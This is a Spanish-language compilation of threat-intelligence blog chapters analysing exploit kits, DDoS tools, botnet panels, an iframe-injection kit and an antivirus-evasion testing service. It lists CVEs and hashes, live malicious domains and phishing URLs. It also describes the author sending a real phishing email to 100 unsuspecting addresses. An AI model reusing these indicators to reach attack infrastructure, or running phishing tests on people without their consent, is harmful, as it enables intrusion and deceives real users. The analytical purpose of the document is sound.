• file.exe (md5:4217e91f65c325c65f38034dc9496772). Detección de 25/40 (62.50%) • 2061.pdf (md5:508f439b4a38c88e5f8860ef07250a95). Detección de 12/40 (30%) • 97275.pdf (md5:1463de6950dd663731e5501a5658d0b8). Detección de 10/40 (25%)

En este caso, ambos archivos pdf (cuyo nombres los crea de forma aleatoria) explotan las vulnerabilidades CVE-2007-5659 (Adobe Collab overflow); CVE-2008-2992 (Adobe util.printf overflow); CVE-2009-0927 (Adobe getIcon). Mientras que el archivo file.exe crea otro llamado winlogon86.exe (md5:4217e91f65c325c65f38034dc9496772).

La "moda" de los paquetes de exploit no termina y parecería que la categorización de "moda", ya le queda chico.

Desde que se comenzó a masificar la utilización de los Exploits Pack (mediados del 2007), son muchas las alternativas de este estilo, tanto de propósito general como de propósito particular, que se ofertan a través de un mercado clandestino mediante el cual no solo se retro-alimenta el negocio del malware con "recursos" eficaces y sencillos (en este caso Siberia Exploits Pack ) 86 que se adaptan a sus necesidades delictivas sin mayores esfuerzos, sino que el mismo desarrollo de crimeware como los exploit pack, conjuntamente con las botnets que permiten crear y administrar, constituye un eslabón importante en la cadena delictiva que difícilmente los caber-criminales dejen a un costado.

Esto, evidentemente da una idea lo suficientemente concreta como para entender que estamos frente acciones y estrategias de "negocio" sostenida por profesionales en materia de delitos informáticos.

RussKill. Aplicación para realizar ataques de DoS Conceptualmente hablando, un ataque de DoS ( Denegación de servicio ) básicamente consiste en bombardear con solicitudes un servicio o recurso informático a fin de saturarlo y que el sistema no pueda procesar más información, de esta manera esos recursos y servicios quedan inaccesibles "denegando" el acceso a cualquiera que los solicite.

Desde el punto de vista de seguridad informática, los ataques de Denegación de Servicio constituyen una problemática importante ya que muchas botnets se encuentran diseñadas para automatizar estos ataques, sobre todo las de propósito particular, aprovechando la capacidad computacional que ofrece la red de zombis. En este caso, el ataque es denominado Denegación de Servicio Distribuido ( DDoS ).

Por otro lado, bajo el marco del concepto de ciber-guerra (Cyber-Warfare), este tipo de ataque forma parte del armamento "bélico" virtual a través del cual las hipótesis de conflictos lo presentan entre sus requerimientos para neutralizar servicios vitales de un Estado.

RussKill es una aplicación web que se cataloga dentro de estas actividades y que a pesar de ser sumamente sencilla, tanto en las funcionalidades como en el modo de uso, representa un ataque que puede ser sumamente efectivo y difícil de detectar.

Como es habitual en el crimeware actual, la aplicación web es de origen ruso y presenta una serie de campos con información sobre cómo y contra quién llevar a cabo el ataque, permitiendo configurar la secuencia de paquetes, es decir, el flujo ( Flows) en cantidad. 87

La opción " Hide url "es una medida auto-defensiva que pretende evitar que el servidor sea detectado.

Si bien existen varios métodos de ataques de DoS, RussKill hace uso de los ataques DoS del tipo HTTP-flood y SYN-flood . En ambos casos se busca inundar los servidores víctimas a través de peticiones http y paquetes con direcciones IP de origen falsas respectivamente.

Como lo he mencionado en un principio, los ataques de denegación de servicio son un peligro latente para cualquier sistema de información, independientemente de la plataforma que soporte los servicios, y este tipo de aplicaciones, en este caso web, demuestra la facilidad con la que un ataque de estas características puede ejecutarse.

JustExploit. Nuevo Exploit Kit que explota Java La industria del crimeware sigue en constante aumento y del mismo modo la comercialización clandestina de aplicaciones web que buscan automatizar los procesos de infección a través de la explotación de vulnerabilidades.

En esta oportunidad, la propuesta se llama JustExploit . Se trata de un nuevo Exploit Pack de origen ruso que posee un condimento que cada vez está siendo tenido en cuenta con mayor fuerza entre los desarrolladores de crimeware : la e xplotación de vulnerabilidades en Java . Es decir, además de explotar las vulnerabilidades conocidas para MDAC y archivos PDF , explota Java en todos aquellos equipos que tengan instalado su runtime.

La captura corresponde al módulo de estadística (Inteligencia ) donde claramente se observa que desde esta aplicación se está controlando un número importante de equipos que utilizan diferentes navegadores y diferentes sistemas operativos, entre los cuales se encuentra el flamante Windows Seven . 88

Otro dato interesante que se desprende de este módulo, es el alto índice de efectividad que posee la explotación de la vulnerabilidad en Java, teniendo, incluso, un mayor nivel de éxito con respecto a las otras dos vulnerabilidades (MDAC y PDF).

A través de un archivo " index.php " que posee un script ofuscado, JustExploit intenta ejecutar tres exploits para las vulnerabilidades CVE-2008-2992, CVE-2009-0927 y CVE-2008-5353. A continuación vemos parte del script.

Entre los archivos que se descargan, se encuentra el que explota Java, llamado sdfg.jar , con una tasa de detección baja. Según VirusTotal, sólo 15 de 41 motores antivirus.

Además, el kit incluye la descarga de los siguientes archivos maliciosos (que por el momento, también cuentan con una tasa de detección muy pobre):

• example.pdf 8/41 (19.51%) • annonce.pdf 7/41 (17.07%) • load.exe 25/41 (60.98%)

Esta actividad se encuentra In-the-Wild hace un tiempo relativamente corto y constituye un peligroso vector de ataque que activamente se encuentra siendo utilizado por parte de los botmasters, y como hemos visto, con una efectividad llamativa.

DDoS Botnet. Nuevo crimeware de propósito particular Un ataque de Denegación de Servicio ( DoS ) consiste, básicamente, en abusar de un servicio o recurso haciendo peticiones sucesivas, ya sea de forma dolosa o culposa, que terminan por quebrar la disponibilidad de ese servicio o recurso de forma temporal o total.

Cuando este tipo de ataques se realiza empleando el poder de procesamiento de un conjunto importante de computadoras realizando el abuso de peticiones de forma sincronizada, estamos en presencia de un ataque de Denegación de Servicio Distribuida ( DDoS ).

Los ataques de DDoS no constituyen una novedad en la actualidad (códigos maliciosos como Blaster, diseñado para realizar este tipo de ataques contra Microsoft en el 2003, es un ejemplo clásico) y su empleo es un recurso de cualquier actividad con connotación maliciosa, incluso, mafioso.

En este sentido, la mayoría de las botnets de propósito general contemplan como parte de su oferta delictiva, ataques de Denegación de Servicio Distribuida aprovechando las bondades que ofrecen las zombis que forman parte de la red, y las de propósito particular destinadas a realizar un tipo de ataque específico contra un objetivo también específico, son el ejemplo de la actualidad.

89

Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como Cyber-Warfare, y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis CYBINT (Cyber Intelligence ).

Sin embargo, bajo este escenario el ataque también puede ser empleado de forma defensiva dentro de una estrategia de análisis que permita evaluar las limitaciones a las que se exponen servicios críticos de un Estado.

Pero independientemente de los propósitos que se escondan detrás del ataque, los ciber-delincuentes (sobre todo los de origen ruso) constantemente buscan facilitar el asunto ofreciendo crimeware desarrollado para ser utilizado exclusivamente con ánimos delictivos.

La cuestión es que una nueva aplicación web para el control de botnets, se encuentra In-the- Wild, comercializándose en el mercado clandestino de Rusia a un precio "competitivo". USD 350 .

Este crimeware está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo SYN Flood , ICMP Flood , UDP , HTTP y HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP.

90

Entre sus funcionalidades se destacan la posibilidad de ejecutarse como un servicio (lo que forma parte de su estrategia de defensa), el control y administración (C&C) se realiza a través del protocolo HTTP, integración con otros crimeware de su estilo, registro de las actividades (logs) con información procesada sobre cada ataque ( Inteligencia ), entre muchas otras.

Yo creo que la investigación de este tipo de acciones delictivas debe poseer ese toque metódico que ofrecen las actividades de Inteligencia, ya que si bien para un usuario hogareño este tipo de ataques puede importar poco, no sucede lo mismo cuando lo que esta en juego son los activos de las compañías. Por lo que los profesionales de seguridad deben estar al corriente del estado del arte del crimeware, e incorporar acciones de Inteligencia en sus actividades profesionales.

T-IFRAMER. Kit para la inyección de malware In-the-Wild T-IFRAMER es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas iframe , y alimentar su botnet . A continuación vemos una captura de la pantalla de autenticación.

Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de malware a través del protocolo http utilizando ataques del tipo Drive-by- Download y Drive-by-Injection mediante la inserción de etiquetas iframe en las páginas web vulneradas.

Los módulos principales son cuatro: Stats , Manager , Iframes e Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware.

El primero de ellos ( Stats ) permite administrar cuentas ftp vulneradas teniendo control sobre ellas con la posibilidad de subir archivos. 91

De esta manera, comienza uno de los ciclos de propagación de códigos maliciosos.

Este módulo de gestión posee varias categorías, entre las que se encuentran:

• Iframed accounts (cuentas iframeadas ). Son las páginas a las que se le ha inyectado scripts dañinos a través de la etiqueta iframe. • Not Iframed (no iframedas ). Básicamente son las cuentas ftp vulneradas. En este caso se almacenan hasta el momento varias cuentas ftp: ftp://distribs:[email protected] ftp://distribs:[email protected] ftp://tools:[email protected] ftp://tools:[email protected] ftp://tools:[email protected] ftp://distribs:[email protected] ftp://NST:[email protected] ftp://NST:[email protected] ftp://NST:[email protected] ftp://NST:[email protected]

• Good accounts ( cuentas buenas ). Permite establecer cuáles de las cuentas ftp vulneradas son útiles o continúan activas. • Freehosts accounts ( páginas alojadas en hosting gratuito ). Se listan todos los ftp vulnerados de los sitios web que se encuentran alojados en hosting gratuitos. • Unchecked accounts (cuentas no chequedas ). Cuentas que aún no se han revisado.

Las siguientes capturas muestras dos de los ftp vulnerados. En cada uno de ellos se puede almacenar cualquier tipo de información (warez, cracks, material pornográfico, phishing, material de pedofilia, cualquier tipo de malware, etc.). 92

La primera de ellas aloja software y la segunda es un mirror para descarga de distribuciones basadas en *NIX.

El módulo Manager es en sí mismo el panel que permite la administración de cada una de las categorías antes mencionadas, incluyendo la posibilidad de eliminar directamente el ftp del historial.

Hasta esta instancia, estos primeros módulos tienen que ver con todo lo relacionado a la gestión de las cuentas. Sin embargo, no termina con estos y los siguientes módulos son más agresivos.

Uno de ellos es el módulo Iframes . Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. 93

En este caso, el script utilizado posee como información la url http://flo4.cn/1.txt .

A su vez, esta url contiene como referencia otra url, pero en este caso, contiene un bruto script que contiene varios exploits y descarga automática de malware.

En esta instancia, luego de intentar correr el exploit, se redirecciona al dominio http://www.google.ru , que parecería manipula la devolución de las búsquedas.

Los exploits que posee son los siguientes:

• CVE-2009-0927 (Adobe getIcon) • CVE-2008-2463 (Office Snapshot Viewer) • CVE-2008-2992 (Adobe util.printf overflow) • CVE-2008-0015 (MsVidCtl Overflow) • CVE-2007-5659 (Adobe Collab overflow)

Los códigos maliciosos que se descargan son:

• ehkruz1.exe. Se trata de un troyano diseñado para capturar la información relacionada al servicio WebMoney y hasta la fecha posee un bajo índice de detección, detectándolo sólo 6 motores antivirus de 41. El nombre del archivo es aleatorio. • egiz.pdf. Contiene exploit (CVE-2007-5659, CVE-2008-2992 y CVE-2009-0927) con una tasa de detección baja, 7/41 (17.08%). Descarga el binario. • manual.swf. Contiene exploit. Su tasa de detección es media-baja, 15/41 (36.59%). • sdfg.jar. Es un troyan downloader con exploit. Su tasa de detección es meda-baja, 14/41 (34.15%). • ghknpxds.jpg. Contiene un exploit. Su tasa de detección es muy baja, 4/41 (9.76%).

El módulo Injector se encarga de las acciones de inyección del código iframe creado a través del módulo anterior, permitiendo configurar una serie de parámetros para optimizar el ataque. 94

Por ejemplo, permite controlar el PageRank, inyectar el código, limpiarlo en caso de ser necesario, chequear el país del hosting y las cuentas ftp, establecer qué dominios atacar (1º y 2º nivel, ambos configurables), configurar expresiones regulares con los nombres de carpetas y archivos más comunes de encontrar en un servidor web, entre otras.

Investigando un poco más los dominios involucrados, salta a la vista que esta aplicación esta siendo utilizada como herramienta de "apoyo" por un conocido crimeware, y del cual ya hemos hablado en este blog, se trata de la última versión de Fragus.

Es decir, el dominio "escondido" entre las etiquetas iframe redirige a una nueva url desde la cual una batería de exploit intentan alcanzar con su artillería a los equipos potencialmente vulnerables, y descargar el malware encargado de reclutar la zombi.

T-IFRAMER posee dos grupos bien diferenciados. Por un lado el de administración y por el otro el de ataque; además de, evidentemente seguir alimentando la botnet; con lo cual está bien claro que quienes se encuentran detrás de este tipo de crimeware saben realmente lo que buscan y, aunque el desarrollo de la aplicación sea muy sencillo, es lo suficientemente efectivo como para ser utilizada por una des botnets más efectivas de la actualidad como lo es fragus. 95

Por último, estas acciones son muy similares a las realizadas por Gumblar (que según algunas fuentes sería de origen chino, aunque lo dudo); y si bien no puedo asegurar que en este caso se trate de los mecanismos que permiten diseminar Gumblar, sobre todo porque en primera instancia este Kit es de origen ruso (al igual que fragus), no cabe dudas que la estrategia (en su conjunto) es muy similar ¿será lo que hoy muchos llaman Gumblar?

DDBot. Más gestión de botnets vía web Si bien estamos acostumbrados a que el desarrollo de aplicaciones destinadas al control y administración de botnets tengan su punto de partida en Europa del Este (sobre todo en Rusia), el negocio que representan las redes zombis para muchos personajes que mueven cotidianamente sus ejes, no tiene frontera ni limitaciones.

En consecuencia, comienzan a emerger desde otros lugares del planeta diferentes alternativas cuyos ejes principales también están destinados a facilitar las maniobras delictivas de los botmasters. Ya habíamos dado cuenta de botnets, en este caso, Open Source escritas en Perl y ahora le toca el turno a DDBot ( Dark Dimension Botnet ).

Bajo el slogan "botmasters your dreams come true!" , DDBot promete funcionalidades diferenciadoras con respecto a sus pares, y si bien tiene una manera más "elegante" de presentar la información, no cambia en cuanto a sus características y a las alternativas de ataque incorporadas en cualquier otra aplicación de este estilo.

Entre sus características, esta aplicación crimeware se compone de siete módulos que están disponibles en función del dinero que se invierta en su compra. Estos módulos son:

• Webpanel/IRC . Es el framework que permite la gestión de las zombis y C&C a través de comando IRC. Esto permite controlar las zombis de forma convencional a través de canales IRC o utilizar cualquier navegador para acceder al Panel Web de control desde el cual también se envían comandos IRC pero a través del protocolo http. Por defecto se conecta al ircd.

• Load & Execute . Es el modulo que permite cargar y ejecutar los binarios que se propagen a través del Panel Web.

• Passwords Stealer . Es el modulo encargado de almacenar las contraseñas. Posse rutinas que le permiten obtener este tipo de información privada de los usuarios que hacen uso de las siguientes aplicaciones: MSN, Outlook, Filezilla, Firefox, Windows.PStore, Trillian, Icq6 y NoIp.Duk. 96

Las rutinas son actualizadas periódicamente con lo cual se estima que se irán agregando posibilidades de obtener contraseñas de otros servicios.

• DDos . El modulo de ataque de Denegación de Servicio Distribuida . El ataque puede ser configurado a través del Panel Web a través de comandos IRC.

• reverseSocks . Incorpora la posibilidad de poder ejecutar todas sus funcionalidades, incluso cuando los equipos se encuentran detrás de un router o protegido con firewall.

• SpamMail . Este módulo incorpora un SMTP que le permite a los spammers operar la botnet con este fin particular. Los correos son personalizados desde el Panel Web de forma muy sencilla.

• Statistics . Es el modulo que permite analizar información estadística (hacer inteligencia) sobre las zombis activas, los países en los que se encuentran y demás, representando la información de una forma poco habitual.

97

Si bien todas las funcionalidades pretenden ofrecer un "producto" lo más automático posible, ya que no necesita demasiadas configuraciones ni demasiados conocimientos para comenzar a operarla; por ejemplo, se puede enviar spam tan solo agregando dos parámetros (básicamente receptor y mensaje), constituye una buena oferta para los script kiddies que se aventuran en la carrera de ciber-delincuentes profesionales.

En cuanto a los costos con los que DDBot se ha insertado en el mercado de crimeware, se encuentran tres paquetes cuyos precios varían según el cual se trate. El primero de los paquetes posee los módulos de ataque DDoS , Password Stealer , Load & Execute , Statistics y el Panel Web . Su valor es de 100 Euros .

La segunda opción, además de las opciones del primer paquete, incorpora el módulo reverseSocks y su valor es de 150 Euros . El tercer paquete, con un costo de 250 Euros , incorpora además el módulo que permite el envío de spam ( SpamMail ).

El ciclo de comercialización concluye cuando el "comprador" deposita el dinero a través de WebMoney o paysafecard .

Por otro lado, si bien no se conoce fehacientemente el origen de desarrollo de este crimeware, hay indicios que hacen suponer que también tiene su origen en Rusia.

Como verán, el comercio de crimeware no para, y seguramente durante el 2010 sigan apareciendo más alternativas que, obviamente, aumentarán su grado de complejidad a medida que las investigaciones revelen a todas luces sus funcionalidades, procesos de comercialización y detección de sus mecanismos maliciosos.

Phoenix Exploit’s Kit. Otra alternativa para el control de botnets Se trata de otra de las alternativas existentes en el mercado clandestino de crimeware . En este caso, otra aplicación web desarrollada en php y originaria de Europa del Este. Phoenix Exploit’s Kit.

Este paquete se compone de nueve (9) exploits:

• IE6 MDAC • MS Office Snapshot • PDF Collab / printf / getIcon en Adobe Reader 98

• IE7 MEMCOR en Internet Explorer 7, Windows XP y Windows Vista • FF Embed • Flash 9 en plugin vulnerable de Shockwave Flash • IE6/IE7 DSHOW • JAVA en JRE • Flash 10 en las versiones 10.0.12.36 y 10.0.22.87 de Flash Player

En cuanto al procesamiento de información, Phoenix permite, como es habitual en la mayoría de este tipo de programas, obtener datos estadísticos sobre los tipos de navegadores (MSIE, Firefox, Opera, entre otros), versiones de los navegadores, tipo de sistemas operativos infectados, paises de origen y algunos datos mas que en su conjunto se transforman en un proceso de Inteligencia habitual llevado a cabo por los botmasters .

Si bien Phoenix Exploit’s Kit no es un desarrollo reciente, su primera versión surgió en el auge de este tipo de crimeware (2007), actualmente se encuentra en el “negocio” clandestino a un precio competido que ronda los USD 400 al ser adquirido con un dominio.

Phoenix se suma a la colección y a la oferta de un mundo delictivo que día a día mueve el engranaje underground de los negocios oscuros y clandestinos del mercado ruso de crimeware iNF`[LOADER]. Control de botnets, marihuana y propagación de malware Se trata de otras de las tantas alternativas que existen en cuanto a aplicativos web diseñados para funcionar como paneles de administración y control de botnets vía web ( C&C ).

En este nuevo ejemplo, como no podía ser de otra forma, es de origen Ruso y a juzgar por el favicon y la imagen que aparece en el ángulo superior izquierdo, quizás su creador tiene admiración por la marihuana y, por que no, tal vez es un fan de Bob Marley :-)

A continuación observamos la captura del panel de administración de iNF`[LOADER] , pero si queremos ver otra también activa, pueden acceder a… mejor escríbanme un mail y les paso la URL :-)

99

Si bien este aplicativo web no es nuevo ya que su primera versión es del 2007, su autor fue actualizándolo una vez por año (la actual es la versión 3) y la última es la que vemos en la captura, no tuvo mucha repercusión dentro del ambiente clandestino de crimeware .

En un principio estuvo asociado a la diseminación de un conocido rootkit llamado Goldun , sin embargo hay que tener en cuenta que independientemente del código malicioso que el kit traiga por defecto, estos aplicativos están diseñados para poder explotar cualquier vulnerabilidad y diseminar cualquier tipo de malware.

Entre sus módulos, posee uno diseñado para intentar un Bypass a los programas antivirus y firewall , módulo de auto-destrucción con lo cual se puede eliminar la información de parte o todas las zombis que formen parte de su red , sistema de estadísticas de zombis discriminadas por país , entre otras.

Como vemos, las funcionalidades ofrecidas por esta amenaza no son competitivas con relación a otras que que existen en el mercado y se consiguen a bajo costo, incluso, hasta es posible conseguir un combo, a pesar de que su costo no supera los USD 100 actualmente.

Aún así, esto no significa que no constituya una grave amenaza, independientemente de la interfaz que tenga el panel de control y administración, si esta activa es porque tiene en su comando, una buena cantidad de zombis que hacen de la actividad del botmaster , una “trabajo” redituable.

100

LuckySploit, la mano derecha de ZeuS LuckySploit es el nombre de un conjunto de scripts (Toolkit) diseñados para explotar diferentes vulnerabilidades y permitir la ejecución de binarios en el equipo víctima de manera arbitraria.

Actualmente, estos scripts, sometidos a ofuscación, están siendo utilizados por la botnet ZeuS para reclutar zombies PC’s a través de ataques Drive-by-Download.

Cuando se accede a la dirección web, sólo se visualiza una página en blanco; sin embargo, al chequear su código fuente aparece un código escrito en JavaScript como el siguiente:

El script se encuentra cifrado con el algoritmo RSA. Esta información se visualiza al final del código.

Otro dato interesante es que el script sólo se visualiza una sola vez, es decir, si se intenta acceder nuevamente a la misma dirección, al chequear nuevamente el código fuente del HTML, el script ya no se encuentra disponible.

Algunos de los dominios que contienen a LuckySploit se encuentran reflejados a continuación: r-state .com/ equi/ trafffive .cn/wait/ ?t=15 trafffive .cn/bm/ ?t=15 directlink9 .cn/wait/ ?t=15 directlink4 .cn/bm/ ?t=15 directlink2 .cn/wait/ ?t=15 directlink1 .cn/bm/ ?t=15 directlink0 .cn/wait/ ?t=15 superioradz .info/opis3/ ?t=2 superioradz .info/opis2/ ?t=2 rodexcom .org/parus/ ?t=5 101 dvlorg .net/parus/ ?t=25 top.sei-keine .com/u-store/ ?t=1 statclick .net/main/ ?t=1 deinglaube .com/ images/ 202.73.57.6/ tomi federalreserve.banknetworks .net/bb/ ?t=2 fuadrenal .com/mito/ ?t=2 fuck-lady .com/prn/index .php hello-to-you .net/rttz/ ?t=6

Cabe aclarar que muchas de estas URL's se encuentran activas, por lo tanto, si decide acceder a cualquiera de ella, tenga presente las medidas de seguridad adecuadas para el caso en cuestión.

En algunos script, al desofuscarlo, claramente se lee al final del mismo un mensaje que dice: attack_level = 0;; try { f = 'Welcome to LuckySploit:) \n ITS TOASTED';

De esta manera, ZeuS se encuentra adhiriendo equipos a su red maliciosa de computadoras infectadas.

102

- Servicios asociados al crimeware - 103

Servicio ruso en línea para comprobar la detección de malware Una de las cosas que preocupan a los creadores/distribuidores de malware es saber si los antivirus son capaces de detectar sus binarios y por tanto arruinar sus planes económicos.

Una posible forma de comprobar la capacidad de detección de dichos antivirus es subir el binario a sitios como VirusTotal, que a fecha de hoy, utiliza 41 motores antivirus diferentes. El gran problema es que estos sitios suelen trabajar en colaboración con las compañías antivirus, retroalimentándolas con las muestras. Por eso, aunque en el momento del análisis es posible que sólo unos pocos de los antivirus (o ninguno en el peor de los casos) sean capaces de identificar las cualidades malignas del binario en cuestión, muy probablemente el ratio de detección subirá a toda velocidad en un breve espacio de tiempo.

Esto ha abierto un nicho de negocio, y en mayo de este año aparecieron posts en diversos foros en los que se anunciaba un nuevo servicio (en aquel momento gratuito) para analizar el grado de detección sin alertar a las casas antivirus. Nacía VirTest.

Actualmente esta página, de origen ruso (aunque posee su versión en inglés) ofrece 26 motores antivirus diferentes, con posibilidad de elegir cuáles quieres que sean utilizados para chequear la muestra. 104

A continuación se puede ver un listado de los motores antivirus y sus respectivas versiones. En la página web especifican con detalle cada cuánto es actualizado cada uno de los antivirus, dependiendo de la política que siga cada compañía para publicar nuevas firmas.

El análisis del binario mostrará una tabla en la que se ve qué antivirus reconoce el código malicioso y cual no. Pulsando el enlace con el nombre del fichero se abrirá un recuadro en el que podemos ver información sobre el tipo de fichero y su tamaño, los distintos hashes del mismo, información sobre su estructura (si es un exe), entre otros.

Si además se pulsa sobre el enlace "See file", se mostrará un fragmento del propio fichero de 1000 bytes de tamaño. 105

Sin embargo, una característica añadida a este servicio que marca un diferenciador con respecto a servicios similares, es la posibilidad de analizar un crimeware del tipo Exploit Pack, dando la url en la que se encuentra alojado.

Según reza la FAQ del servicio, realmente no se chequea el script, sino el código resultante que será recibido por los distintos tipos de navegadores. Las pruebas se realizan con Firefox, IE6, IE7, IE8, Opera y Chrome.

106

Haciendo clic sobre alguno de los enlaces podremos ver el recuadro de antes ampliando la información sobre el análisis.

Para poder realizar uno de estos análisis es necesario crear una cuenta y disponer de efectivo en la misma, ya que se ha convertido en un servicio de pago con los siguientes precios:

El pago de las cuotas se realiza exclusivamente a través de WebMoney. Existe al menos otro servicio similar que actualmente es gratuito y se encuentra en fase Beta. Suponemos que en breve pasará a ser de pago también.

Resumiendo, una prueba más de que no sólo la explotación del malware genera beneficios, sino que también se mueve dinero en servicios paralelos a esta industria. Y en algunos casos, como el que nos ocupa, habría que ver si se puede considerar este servicio como un acto delictivo o no.

107

Nivel de (in)madurez en materia de prevención Hace unos días me llegó un correo electrónico (no llegó como spam) que me llamó poderosamente la atención, por lo cual me interesó saber su origen. A continuación pueden ver una captura del correo.

Se trata de un mensaje falso enviado de manera intencional a mi dirección de correo. Lo primero que se me cruzó en la mente al verlo fue, por un lado, el recuerdo de los viejos "xploits " que creía, erróneamente, desaparecidos por el sólo hecho de subestimarlos debido a su sencillez y su condición muy burda para intentar engañar a los usuarios; por el otro, las preguntas… ¿serán efectivos en la actualidad? , ¿cuál es el nivel de prevención de los usuarios frente a este tipo de engaños?

La cuestión es que también quería conocer su origen. Fue así que llegué hasta una página web que ofrece el "servicio", precisamente, de envío de este tipo de engaños con varias alternativas en cuanto a las estrategias empleadas. Y claro… en realidad, no es que los "xploits" dejaron de existir sino que cambiaron de nomenclatura, ya que esto no es otra cosa que Phishing .

Sin embargo, antes de abordar con mayor detalle algunas características de este sitio, me gustaría compartir algunos de los argumentos manifestados por el autor del mismo a través de las "condiciones de uso". Lo primero que podemos leer es la bienvenido…

"Te interesaría descubrir las contraseñas de amigos/as, novios/as, jefes/as, enemigos/as de quien tú quieras? Sabias que obteniendo la contraseña de tu Victima podrías conseguir muchísimas cosas como datos personales, datos de acceso a sitios personales e infinidad de información."

Este tipo de actividades esta penada en la mayoría de los países ya que el correo presenta el carácter de privado… ¿apología al delito? Además… alguien quiere acceder a mi cuenta de correo :) 108

Luego sigue con algunas cosas graciosas curiosas que comparto… "Toda la información aquí expuesta es para uso educativo y/o científico."

¿Uso científico?... sin palabras...

"Nuestro software no se diseña para ser utilizado para los propósitos malévolos, el producto fue pensado para los adultos responsables, no cualquier persona bajo edad de 18 años podrá utilizar nuestros programas."

Sin embargo, al acceder al sitio no se despliega ninguna advertencia que manifieste que solo pueden acceder al sitio los mayores de 18 años…

"Los programas espías fueron creados como solución para la supervisión y la vigilancia alejadas de la computadora.”

Desde la perspectiva en la que seguridad de la información analiza estos aspectos, no es más que una acción enmarcada bajo la figura de violación de la privacidad. Hay alternativas menos intrusivas y agresivas para los propósitos de los padres que desean "monitorear" ciertas actividades de sus hijos sin llegar a un estado abusivo. En este sentido considero que la mejor solución no sirve de nada si no está acompañada de educación en cuanto a los peligros que existen en Internet. La cuestión no es espiar a nuestros hijos…

Dejando de lado las cuestiones superficiales de este mecanismo de engaño, el dominio se encuentra alojado en Hosting Solutions International Inc , ubicado en EEUU bajo la dirección IP 69.64.58.50 . Al menos tres dominios más se encuentran en esta dirección y todas redireccionan a la misma página.

Cuando se accede a este "servicio", nos encontramos con un menú mediante el cual se gestionan las maniobras de engaño, permitiendo enviar correos electrónicos con mensajes falsos a los principales servicios (reales) de webmail y dos de las más populares redes sociales. Incluso, es posible personalizar los mensajes.

El procedimiento, luego de seleccionar la opción del servicio que se utilizará para darle un nivel coherente de confianza, es tan sencillo como seleccionar una opción entre varias. A modo de ejemplo, veamos una captura de una cuenta de Gmail bombardeada con un ejemplo de cada uno.

109

Todos ellos contienen en el cuerpo del mensaje, enlaces que direccionan a una página falsa, en este caso de Gmail, que solicita un proceso de autenticación que es parte del engaño. La página es una clonación de la real y lo que busca es robar los datos de autenticación del usuario para ese servicio de webmail. Pero en función de esto, la cuestión es… ¿cómo darse cuenta que es falsa?

Principalmente, chequeando hacia dónde redireccionan los enlaces que se encuentran en el mensaje. Con el solo hecho de pasar el cursor sobre el vínculo, en la barra de tareas aparece la dirección real.

Igualmente, hay que chequear la URL. En este caso, la dirección falsa comienza con http:// login.live.1d8gfh35f9h6438d2g6.tumsg.com /accounts/ServiceLogin.php?service...

Mientras que la real comienzo con http s:// www.google.com /accounts/ServiceLogin?service...

Además de ser completamente diferente, la falsa no posee el protocolo seguro (https) característico de todos los sitios que requieren autenticación vía web. Si bien este aspecto en particular no garantiza seguridad plena, es un buen hábito chequear su existencia.

Sin embargo, supongamos que el ataque se dirige a un usuario de Hotmail. La dirección real de este es la siguiente: http:// login.live.com /login.srf?wa=wsignin1.0&rpsnv=11&ct=1255052408&rver=6.0.5285.0&wp=MBI& wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=3082&id=64855&mkt=es-es

En este caso no nos encontramos con "https" y la dirección falsa es muy similar a la real, con lo cual, lo más probable es que un usuario que no entiende mucho del tema, caída en la trampa sin demasiado esfuerzo, sino pregunten… ¿cuántos usuario verifican la dirección?

Ahora, tratemos de encontrar alguna respuesta para las preguntas líneas arriba comentadas (¿serán efectivos en la actualidad?, ¿cuál es el nivel de prevención de los usuarios frente a este tipo de engaños?)

Para obtenerlas se realizó una prueba que consistió básicamente en el envío de correos con mensajes falsos empleando los "servicios" ofrecido por este sitio web, obviamente bajo un estricto sentido ético ya que la intención es sólo investigativa. Además, a menos que se pague un costo mínimo de USD 15, no es posible acceder a las contraseñas.

Lo que deja en evidencia el negocio que se esconde detrás de este sistema de engaño. Además que al mismo tiempo, sus creadores se hacen de una importante base de datos que hasta el momento cuenta con más de 95.000 registros, donde cada uno de esos registros es una víctima .

A nuestros efectos, obtener un dato estadístico del nivel de maduración en cuanto al sentido de prevención en los usuarios, no necesitamos ver contraseñas sino saber cuantos usuarios confían en el mensaje falso.

La muestra consistió en 100 direcciones a las cuales se envió el mismo mensaje que había llegado a mi dirección de correo. De un día al otro, es decir, en menos de 24 horas, de los cien correos enviados, estos fueron los resultados:

110

Mensajes enviados: 100 Usuario que cayeron en la trampa: 12

Como vemos, un poquito más del 10% de los usuarios que recibieron este correo con el mensaje lo han abierto, y no solo eso, sino que también han confiado en él ofreciendo, sin saberlo, los datos de sus credenciales de acceso a sus cuentas de correo electrónico.

En consecuencia, los ataques triviales de este estilo son más comunes de lo que se cree y cuentan con un nivel de efectividad preocupante, pero es más preocupante aún saber, en cierta forma, que el nivel de madurez en materia de prevención sigue siendo escaso ya que si se potencian estos valores en función de la cantidad de correos de este tipo que cualquier spammer podría enviar por día, la cifra final de víctimas es muy alta.

Automatización en la creación de exploits En la mayoría de los casos, una de las piezas más comunes que se utilizan en cualquier ataque son los exploits , y en el mundo de los códigos maliciosos también. Todos los ataques utilizando malware y que se llevan a cabo aprovechando la infraestructura que ofrece Internet, involucran como componente esencial el aprovechamiento de vulnerabilidades .

Independientemente de las vulnerabilidades públicas que día a día aparecen (y sin incluir las del tipo 0-Day ) las más relevantes, por ser las más explotadas, son las que aprovechan debilidades en aplicaciones diseñadas para visualizar archivos .pdf, .swf y, por supuesto, las de Windows.

En este sentido, el hecho de que estén de "moda" es un atributo que creo, se basa principalmente en la prematura conciencia sobre los riesgos de seguridad que todavía pareceríamos tener. Que aún hoy se estén explotando vulnerabilidades solucionadas hace más de tres años es la evidencia más clara; y que además, conforman una de las estrategias fundamentales que utilizan los botmasters para reclutar zombis a gran escala.

